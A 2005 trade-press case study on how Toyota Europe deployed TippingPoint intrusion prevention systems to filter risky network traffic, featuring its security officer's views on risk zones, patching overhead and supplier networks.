An intrusion prevention system can identify and remove risky traffic before it can do harm. In this case study, Helen Beckett finds out how it works in practice for Toyota
While software, router and anti-virus suppliers work out how to deliver end-to-end security that is easy to use, car maker Toyota has taken up an alternative technology that reduces security risk. "Intrusion prevention system means we sleep easier at night," said Richard Cross, European IS security officer at Toyota Europe.
Toyota takes a pragmatic view to security. "We are not a bank or Nato. I work out a figure of how much I should spend on security per vehicle produced, according to risk," said Cross. And he has discovered that removing risky traffic from the network is a far more cost effective strategy than focusing on having zero vulnerability on clients and servers.
"There's a very high management overhead in securing every desktop and server because you have to rely on the skill and diligence of an army of system administrators." Effectively, Cross' team feels held to ransom every time Microsoft issues a batch of patches because they cannot do anything else until the task is completed. It's also a time consuming method. "If one server breaks down during the distributing of patches then it is a flawed process."
By contrast, intrusion prevention systems (IPS) reduce the risk of security breaches by removing polluted traffic before it reaches destination devices or servers. An evolution of intrusion detection, an IPS sits on the gateway and "sniffs" or analyses traffic on the network. Any anomalies in the use of protocols or unusual patterns of packets that are repeated are removed and quarantined.
Cross was impressed by the "prevention rather than cure" philosophy when he surveyed the market to upgrade Toyota Europe's security provision. The manufacturer's plants operate around the clock, and parts and materials are requested from suppliers when needed, so the wide area network must always be available. Constant availability is also necessary for Toyota's Brussels local area network, where the company hosts its enterprise applications, including Oracle Financial and Enterprise Resource Planning software.
Central to Toyota's business success is a just-in-time strategy that entails being closely networked with an extensive supply chain. The supply chain is intrinsic to Toyota's manufacturing business but introduces new levels of security risk. "We simply cannot tolerate a single network outage due to a denial of service, flood or other cyber attack," said Cross.
Cross therefore designated Toyota's various network segments into high, low and medium risk zones, depending on whether it is an internally or third party-managed network. "We use a lot of parts suppliers and designers. While we have a great deal of respect for what they produce, we have no idea how their networks are managed."
Cross researched security systems from TippingPoint, Cisco, Symantec, McAfee and ISS. He settled on TippingPoint, a product from a division of 3Com, because, "It was the simplest to deploy and manage because they're standards-based and can inter-operate with all kinds of hardware.
"We have found that having a cohesive layer of IPS removes a lot of the rubbish on the network before it reaches the server." Toyota Europe initially installed TippingPoint to filter incoming traffic from a high risk network zone and recorded a 60% drop in the level of disruptive activity entering the network. As a result, Toyota Europe is rolling it out as the very first layer of security at the gateway to moderate risk network segments too.
The successful strategy of blocking malicious traffic has also encouraged Toyota to install the IPS as a sentinel at its headquarter's internet gateway, effectively the boundary firewall. Regardless of the number of filters used or the volume of traffic, packets move through the IPS at wire speed with an imperceptible latency of less than 215 microseconds. This ensures that Toyota Europe's applications run optimally, while being transparently and automatically protected from threats.
Cross gave the example of an employee who travels to Switzerland and picks up a virus on his laptop, and then returns and plugs it in inside the firewall. "There's an outstanding chance that something could go wrong." Either the anti-virus signature could fail or even the personal firewall. The IPS kicks in because it is integrated with the security management and so gives an alert. "We get a good idea what the source of the problem is and also the kind of virus. Plus we can track the traffic to a particular segment of the network and even the device" said Cross.
The aspect that surprised Cross most about the IPS from TippingPoint, was its accuracy. "We are incredibly suspicious of marketing speak - but it does everything it says on the tin. It doesn't remove legitimate traffic, but just takes out all the crud."
Having the equivalent of a traffic cop patrolling the network is an important addition to Toyota's security defences. Cross feels the traditional reliance on passwords, patching and authentication is insufficient. As a minimum he would look for a single management console for all security information, plus authentication of the device and user. "Passwords are not good enough in a large enterprise with multiple access points. Their lifespan of reliability has expired."
Greatly reduced management overhead is a knock-on effect of using intrusion prevention. Cross and his team spend about one hour a week looking at the logs. Managing six IPS gateways is a lot more practicable than overseeing a patching regime that aims to achieve "zero vulnerability". Cross still does his patching routines, but at a frequency that suits him, rather than being held hostage to fortune.
This was first published in November 2005